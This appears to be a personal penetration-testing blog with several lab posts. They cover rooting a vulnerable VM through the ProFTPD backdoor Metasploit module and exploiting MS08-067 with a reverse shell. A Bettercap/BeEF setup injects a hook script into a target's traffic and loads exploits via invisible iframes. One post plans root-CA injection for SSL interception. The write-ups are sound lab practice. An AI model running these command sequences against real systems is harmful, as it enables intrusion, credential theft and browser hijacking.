Basic Pentesting 1

In this post I’m going to try my hand at Basic Pentesting 1 by Josiah Pierce. For the purpose of this article, command line entries and results will be in italics.

First things first, let’s find it with nmap.

nmap 192.168.1.0/24 > nmap-network_results.

which (among other things turned up the following VM which was new to my network.

Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)

Interestingly, looks like it’s hostname is vtcsec (made a note of that…)  Aside from that I see ftp, ssh, and http open. Let’s get some more details with nmap.

nmap -sV -O 192.168.1.227 > nmap-sv-o-results.txt

Which produced the following results.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-05 11:32 EST
Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.00094s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

Ok, now we’ve got the versions of the services. Let’s see if there’s any low hanging fruit here. I’ll check searchsploit for the FTP server.

searchsploit proftpd 1.3.3c

The output didn’t copy neatly to this blog format, (I run URXVT, so it’s likely some unicode that won’t translate to ASCII neatly… whatever). I did find two options availabl, the one that interests me was “Backdoor Command Execution (metasploit). So let’s fire up metasploit and see what we can do.

msfconsole

Metasploit loads up

search ProFTPD

It runs and there it is: exploit/unix/ftp/proftpd_133c backdoor! This should be easy enough then.

use exploit/unix/ftp/pro_ftpd_133c
set rhost 192.168.1.227
exploit

Voila. I got a shell. Let’s see who I am.

whoami

I’m root. Well damn. That was easy. I’m quite certain there’s other ways in though. So next time I’ll try some other routes in. That’s all for now.

 

If you want to see some other vulnerable VM write-ups I’ve done check out the vulnerable VM category.

Installing Kali on a Raspberry Pi Zero W

Overview

I love my little Pi Zero W’s, and I love Kali. So why not combine the two? So here’s a post about  Installing Kali Linux on a Raspberry Pi Zero W.   I’ve done this before, and it’s reasonably well documented elsewhere, but I hate googling for all the pieces each time I do this so I figured I’d make a blog post documenting it all for the future so I’ve got all the links in one place

FWIW, I do most of my daily driving on Windows because that’s what I use at work. Hence this will be written for a Windows PC. It’s also high level because honestly, this is easy and if you’re goal is to install Kali on an rpi0w, you probably don’t need much hand holding. 😉

Materials Needed
Process
  1. Format the card with the flasher utility
  2. Write the ISO to the card with Etcher.
  3. Boot up the pi.
References

Messing Around in Metasploit

Over lunch break I’ve just been reading up on some general things you can do in Metasploit.  Been playing some misc. modules such as:

  • auxiliary/scanner/portscan/syn
  • auxiliary/scanner/portscan/tcp
  • auxiliary/scanner/smb/smb_version

I also learned about the IP Idle Scan technique. Very clever indeed. There’s a module for that too. scanner/ip/ipidseq

References:
https://www.offensive-security.com/metasploit-unleashed/port-scanning/
https://nmap.org/book/idlescan.html

 

Injecting Certificates?

Tonight I’m messing around with post/windows/manage/inject_ca. Specifically trying to get it to work.  Seems like a handy little item to have for SSL based MITM attacks.  Create a root CA, use an exploit to add it to the root of a target, then lay low and wait for web logins.  Doubly useful for those HSTS secured sites…

I didn’t realize that certificates are just stored as binary blobs in the registry. Neat.

Also, XP SP3 just straight up doesn’t understand SHA512. At all. I had to apply a hotfix to get it up and running.

References:
https://labs.mwrinfosecurity.com/blog/masquerading-as-a-windows-system-binary-using-digital-signatures/
https://support.microsoft.com/en-us/help/968730/windows-server-2003-and-windows-xp-clients-cannot-obtain-certificates

Mastering the Obvious

Today I learned the difference between true meterpreter and the reverse shell. Previously I had used meterpreter to get a shell. Didn’t know you could just have it give you one. Though I’ve found it somewhat inconvenient not having the full meterpreter suite available, so my preference is definitely the meterpreter vs the straight reverse shell.

windows/meterpreter/reverse_tcp == Standard Meterpreter
generic/shell_reverse_tcp == command prompt. Yes, duh, a shell.

Also found this nifty cheat sheet. (PDF warning)

Clubbing Baby Seals

So to get some practice I’ve built a lab of obscenely vulnerable Windows client machines.  While this doesn’t really represent any kind of real world situation it’s been a good place for me to play around and test things while actually seeing some results. Though it does kind of feel like clubbing a baby seal at times.

  • XP SP3 or unpatched 7.
  • Adobe Reader 8.0
  • Adobe Air 20.0.0.204
  • Adobe Flash 18.0.0.194
  • Chrome 22.0.1229.0
  • Firefox 17.0
  • Java JRE 7 update 2
  • Realplayer 15.0.5.109
  • Shockwave 11.0.3.471

The process goes like this. Install OS, join domain, install all the software, configure the profile, snapshot the VM, ready for use!

The first tests I’ve been doing have all been MITM based browser attacks, but today I felt like being a bit more direct.

I initially tried using exploit/windows/dcerpc/ms03_026_dcom.  The first run indicated the port wasn’t open. Which made sense because I never opened that port on the target. So I created a file share to “prime the pump”.  Still no dice.

Next up was exploit/windows/smb/ms08_067_netapi. This one worked, and I got a shell. I’m documenting the actual text below so I have it for later.

root@KALI:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100 (target)
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.50 (Kali)
msf exploit(ms08_067_netapi) > exploit
meterpreter > (Success!)

I’ll probably mess around more later today.

Fixing “Database not connected or cache not built” in Metasploit

Configure the database service to start automatically
update-rc.d postgresql enable

Initialize the database
msfdb init

Launch msfconsole and rebuild the cache
root@KALI:~# msfconsole
msf > db_rebuild_cache

Wait for awhile. It will finish eventually.

MetaSploit, Bettercap, and BeEf

MetaSploit, Bettercap, and BeEf work well together. Below is the basic syntax I used in Kali. It assumes the default gateway is 192.168.1.1, the Kali host is 192.168.1.50, and the target is 192.168.100.

Start MetaSploit using msgrpc
root@KALI:~#msfconsole
msf >load msgrpc ServerHost=192.168.1.50 Pass=abc123

Start BeEF
root@KALI:~# cd /usr/share/beef-xss
root@KALI:~# ./beef

Copy the hook url from the resulting command output.
(Will look something like this:  http://192.168.1.100:3000/hook.js)

Start bettercap with the arguments to point the target machine to BeEF.
root@KALI:~# bettercap -T 192.168.1.1 -T 192.168.1.100 –proxy-module injectjs –js-url http://192.168.1.100:3000/hook.js

Open up the BeEF Admin URL by browsing to http://192.168.1.50:3000/ui/panel

Assuming a client is hooked, investigate the client to determine likely metasploit options.  Get metasploit. Use the “Create invisible iframe” command to spawn an invisible iframe to the URL of the metasploit exploit.

That’s it.

References:
https://www.metasploit.com/
https://www.bettercap.org/
http://beefproject.com/
https://sathisharthars.com/